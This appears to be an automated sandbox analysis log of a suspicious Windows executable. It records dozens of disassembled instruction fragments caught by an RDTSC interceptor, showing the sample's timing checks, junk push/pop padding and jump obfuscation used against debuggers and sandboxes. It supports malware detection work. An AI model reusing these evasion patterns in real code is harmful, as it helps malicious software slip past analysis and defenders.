Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F0633B second address: F0639F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA521013245h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ebx 0x0000000f call 00007FA521013238h 0x00000014 pop ebx 0x00000015 mov dword ptr [esp+04h], ebx 0x00000019 add dword ptr [esp+04h], 00000014h 0x00000021 inc ebx 0x00000022 push ebx 0x00000023 ret 0x00000024 pop ebx 0x00000025 ret 0x00000026 mov dword ptr [ebp+122D181Eh], eax 0x0000002c lea eax, dword ptr [ebp+1247B0A4h] 0x00000032 jmp 00007FA521013241h 0x00000037 nop 0x00000038 jng 00007FA52101324Dh 0x0000003e push eax 0x0000003f push edx 0x00000040 je 00007FA521013236h 0x00000046 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F0639F second address: F063BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA52075DA5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a js 00007FA52075DA7Ah 0x00000010 push eax 0x00000011 push edx 0x00000012 jne 00007FA52075DA56h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F063BD second address: EE2F59 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA521013248h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a or edx, 65514527h 0x00000010 call dword ptr [ebp+122D210Fh] 0x00000016 jc 00007FA52101326Ch 0x0000001c push eax 0x0000001d push edx 0x0000001e push edi 0x0000001f pop edi 0x00000020 jmp 00007FA52101323Dh 0x00000025 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F064B7 second address: F064BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F06870 second address: F06874 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F06874 second address: F06892 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FA52075DA66h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F06892 second address: F06896 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F0694A second address: F06959 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jng 00007FA52075DA56h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F06A6F second address: F06A77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F06B4D second address: F06B65 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA52075DA5Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F06D0F second address: F06D20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA52101323Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F06D20 second address: F06D5A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA52075DA67h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FA52075DA62h 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 push edx 0x00000019 pop edx 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F06D5A second address: F06D88 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FA52101323Ch 0x00000008 jno 00007FA521013236h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [eax] 0x00000012 jno 00007FA521013244h 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c push edi 0x0000001d push esi 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F06FBB second address: F06FC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F06FC1 second address: F06FC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F07276 second address: F0727A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F0727A second address: F07285 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F409D5 second address: F409E8 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FA52075DA56h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F40B76 second address: F40B81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F40B81 second address: F40B85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F40B85 second address: F40BA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FA521013243h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F40CCF second address: F40CF9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FA52075DA64h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007FA52075DA58h 0x00000011 pushad 0x00000012 popad 0x00000013 jl 00007FA52075DA5Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F41121 second address: F41127 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F41259 second address: F41266 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F44BDB second address: F44BDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F44BDF second address: F44BE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F4820A second address: F48217 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop esi 0x00000007 pushad 0x00000008 push edx 0x00000009 pop edx 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F48217 second address: F48222 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jnc 00007FA52075DA56h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F48222 second address: F4822A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F4822A second address: F48237 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F48237 second address: F4823B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F4823B second address: F48245 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F48245 second address: F4825A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA521013241h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F483DD second address: F483E8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jns 00007FA52075DA56h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F486B9 second address: F486D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FA52101323Fh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F486D0 second address: F486D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F4AD23 second address: F4AD28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F4AD28 second address: F4AD2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F4EC28 second address: F4EC3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA52101323Ah 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F4E4DD second address: F4E500 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FA52075DA56h 0x0000000a jmp 00007FA52075DA67h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F4E500 second address: F4E51E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007FA521013249h 0x0000000b jmp 00007FA521013243h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F4E9A5 second address: F4E9A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F4E9A9 second address: F4E9AE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F4E9AE second address: F4E9B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F4E9B6 second address: F4E9BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F53FE8 second address: F53FED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F53FED second address: F54009 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FA521013243h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F54009 second address: F5400D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F5400D second address: F5405A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b pushad 0x0000000c jmp 00007FA52101323Eh 0x00000011 push edx 0x00000012 pop edx 0x00000013 jmp 00007FA521013240h 0x00000018 jmp 00007FA521013248h 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 jnl 00007FA521013236h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F542B2 second address: F542C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FA52075DA56h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push ecx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F542C4 second address: F542C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F542C9 second address: F542CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F542CE second address: F542D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F070D1 second address: F0713C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop ecx 0x00000008 mov dword ptr [esp], eax 0x0000000b jmp 00007FA52075DA60h 0x00000010 mov ebx, dword ptr [ebp+1247B0E3h] 0x00000016 jnl 00007FA52075DA5Ch 0x0000001c add eax, ebx 0x0000001e push 00000000h 0x00000020 push edi 0x00000021 call 00007FA52075DA58h 0x00000026 pop edi 0x00000027 mov dword ptr [esp+04h], edi 0x0000002b add dword ptr [esp+04h], 00000016h 0x00000033 inc edi 0x00000034 push edi 0x00000035 ret 0x00000036 pop edi 0x00000037 ret 0x00000038 mov edx, dword ptr [ebp+122D1DB5h] 0x0000003e nop 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007FA52075DA63h 0x00000048 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F0713C second address: F07140 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F07140 second address: F07146 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F07146 second address: F07169 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA52101323Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jns 00007FA521013240h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F07169 second address: F0716F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F54593 second address: F54599 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F54599 second address: F5459D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F5459D second address: F545A3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F545A3 second address: F545C0 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA52075DA5Ah 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pop edx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 jnl 00007FA52075DA56h 0x00000017 push edx 0x00000018 pop edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F545C0 second address: F545C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F5923D second address: F59255 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA52075DA56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FA52075DA5Eh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F59255 second address: F59261 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F59261 second address: F59265 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F59265 second address: F59273 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F586A5 second address: F586B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F586B2 second address: F586B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F586B8 second address: F586D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FA52075DA5Fh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F586D1 second address: F586DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F5882D second address: F5884A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA52075DA5Ah 0x00000007 jbe 00007FA52075DA56h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 je 00007FA52075DA56h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F589BF second address: F589D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA521013246h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F589D9 second address: F589FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FA52075DA69h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F589FB second address: F58A06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FA521013236h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F58A06 second address: F58A0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F58A0C second address: F58A12 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F5E75C second address: F5E760 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F5E760 second address: F5E76A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F5E76A second address: F5E76E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F5E8C4 second address: F5E8E1 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA521013236h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007FA52101323Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F5E8E1 second address: F5E8E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F5E8E7 second address: F5E8EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F5EA4D second address: F5EA56 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F5EA56 second address: F5EA5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F5EA5E second address: F5EA63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F5ED27 second address: F5ED31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F5ED31 second address: F5ED4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FA52075DA64h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F5ED4A second address: F5ED54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FA521013236h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F5ED54 second address: F5ED58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F5F03F second address: F5F04D instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA521013238h 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F5F392 second address: F5F39E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FA52075DA56h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F5F39E second address: F5F3AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007FA521013236h 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
